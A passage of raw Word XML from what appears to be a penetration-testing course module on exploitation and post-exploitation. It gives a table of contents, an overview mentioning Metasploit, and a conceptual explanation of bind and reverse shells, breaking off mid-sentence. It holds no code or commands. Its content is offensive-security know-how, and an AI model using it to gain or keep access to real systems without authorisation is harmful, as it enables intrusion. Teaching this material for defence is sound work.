            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A13093E" w14:textId="3E05AB31" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269448" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Presentation</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269448 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2756779A" w14:textId="7D8770DC" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269449" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation - Getting a shell</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269449 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B370DE3" w14:textId="0B14F3BF" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269450" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation – Network vector</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269450 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A1C871E" w14:textId="419F484C" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269451" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269451 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="437878F1" w14:textId="08C5AC60" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269452" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How to protect yourself</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269452 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FC496BB" w14:textId="58B5B7E0" w:rsidR="0008357F" w:rsidRDefault="00271136">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26269453" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Parchment"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269453 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FC52138" w14:textId="2DE514C6" w:rsidR="000D6E50" w:rsidRPr="000D6E50" w:rsidRDefault="00D74A17" w:rsidP="000D6E50">
          <w:pPr>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BF4270">
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="02E80C21" w14:textId="77777777" w:rsidR="000D6E50" w:rsidRDefault="000D6E50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
          <w:color w:val="CC0000"/>
          <w:kern w:val="28"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73433C6B" w14:textId="406C93C9" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc26269448"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Presentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="206E578B" w14:textId="7FB5CA9A" w:rsidR="00E5425A" w:rsidRDefault="00E5425A" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>This module focuses on exploitation and post</w:t>
      </w:r>
      <w:r w:rsidR="00784F58">
        <w:t>-exploitation phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A8308" w14:textId="77777777" w:rsidR="004245A7" w:rsidRDefault="004245A7" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9DFF2E" w14:textId="77777777" w:rsidR="006213FC" w:rsidRDefault="009A0423" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of the exploitation phase is to </w:t>
      </w:r>
      <w:r w:rsidR="007B0F04">
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an access to a system or </w:t>
      </w:r>
      <w:r w:rsidR="007B0F04">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">resource by bypassing security restrictions. The first two modules </w:t>
      </w:r>
      <w:r w:rsidR="006213FC">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r>
        <w:t>developed how to gather information about a target and how to establish a list of machines of interests. The</w:t>
      </w:r>
      <w:r w:rsidR="00BB07DB">
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB07DB">
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006213FC">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to identify the entry point into the organization.</w:t>
      </w:r>
      <w:r w:rsidR="00BB07DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B53E2" w14:textId="3C8691B5" w:rsidR="009A0423" w:rsidRDefault="006213FC" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Several</w:t>
      </w:r>
      <w:r w:rsidR="00BB07DB">
        <w:t xml:space="preserve"> techniques and exploits will be covered in the first part of this module </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00BB07DB">
        <w:t xml:space="preserve"> show how to get a shell access on various target systems</w:t>
      </w:r>
      <w:r w:rsidR="00DA5EE3">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The network seen as an attack vector will then be covered and some demonstration will be performed.</w:t>
      </w:r>
      <w:r w:rsidR="000B57A2">
        <w:t xml:space="preserve"> The first section aims to teach the basics of exploitation. The </w:t>
      </w:r>
      <w:r w:rsidR="005C316A">
        <w:t xml:space="preserve">powerful </w:t>
      </w:r>
      <w:r w:rsidR="000B57A2">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="005C316A">
        <w:t xml:space="preserve"> framework</w:t>
      </w:r>
      <w:r w:rsidR="000B57A2">
        <w:t xml:space="preserve"> and its philosophy are then introduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FEB13" w14:textId="77777777" w:rsidR="004245A7" w:rsidRDefault="004245A7" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17135E19" w14:textId="4ABBE7A6" w:rsidR="002D1411" w:rsidRPr="00E5425A" w:rsidRDefault="002D1411" w:rsidP="00E5425A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-exploitation’s purpose is to determine the value of a compromised machine and to maintain the access and control of it for a later use. </w:t>
      </w:r>
      <w:r w:rsidR="002A7C22">
        <w:t>Once an access is obtained on a system, an attacker will try to gain more privileges and</w:t>
      </w:r>
      <w:r w:rsidR="007B0F04">
        <w:t xml:space="preserve">/or </w:t>
      </w:r>
      <w:r w:rsidR="002A7C22">
        <w:t>to access new machines and network</w:t>
      </w:r>
      <w:r w:rsidR="007B0F04">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002A7C22">
        <w:t xml:space="preserve">. This section covers some techniques and tools that are useful </w:t>
      </w:r>
      <w:r w:rsidR="0005282F">
        <w:t xml:space="preserve">to penetration testers and hackers to </w:t>
      </w:r>
      <w:r w:rsidR="00A124F9">
        <w:t>achieve this task</w:t>
      </w:r>
      <w:r w:rsidR="00D208DB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B9193" w14:textId="0D3683D3" w:rsidR="00B80C42" w:rsidRDefault="002A5181" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc26269449"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation -</w:t>
      </w:r>
      <w:r w:rsidR="00B80C42">
        <w:t xml:space="preserve"> Getting a shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3D08680D" w14:textId="4DDCCB0D" w:rsidR="006E344C" w:rsidRDefault="006E344C" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of an attacker is often to get a shell on the target machine. A key point to </w:t>
      </w:r>
      <w:r w:rsidR="00AD34CC">
        <w:t>have in mind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is whether to choose a </w:t>
      </w:r>
      <w:r w:rsidRPr="00944F79">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00944F79">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell, as one can succeed when the other will fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C8415" w14:textId="0D3671C2" w:rsidR="006E344C" w:rsidRDefault="006E344C" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>On one hand, the bind shell is when the attacker connects to the target host on an open port that</w:t>
      </w:r>
      <w:r w:rsidR="00D34F2D">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D34F2D">
        <w:t>listening</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for connection</w:t>
      </w:r>
      <w:r w:rsidR="00D34F2D">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00622D5E">
        <w:t>is providing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6D340" w14:textId="77777777" w:rsidR="003453A0" w:rsidRDefault="003453A0" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B3C66F" w14:textId="77777777" w:rsidR="006E344C" w:rsidRDefault="006E344C" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C99BEE6" wp14:editId="313D6854">
            <wp:extent cx="4287520" cy="11531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nd-shell.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287520" cy="1153160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2F20A" w14:textId="77777777" w:rsidR="003453A0" w:rsidRDefault="003453A0" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D081FE" w14:textId="7EDCCF7D" w:rsidR="006E344C" w:rsidRDefault="003453A0" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B646449" wp14:editId="218AB2A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>255368</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>372110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3821430" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="762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verse-shel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21430" cy="2717800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006E344C">
        <w:t>The reverse shell on the other hand, is initiated by the target machine, which will connect back to a listening service on the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817B5CE" w14:textId="7EEDAB98" w:rsidR="006E344C" w:rsidRDefault="006E344C" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29070A7A" w14:textId="6067458A" w:rsidR="00E735BC" w:rsidRDefault="006E344C" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Typically, bind shell</w:t>
      </w:r>
      <w:r w:rsidR="003453A0">
        <w:t>s</w:t>
      </w:r>
      <w:r>
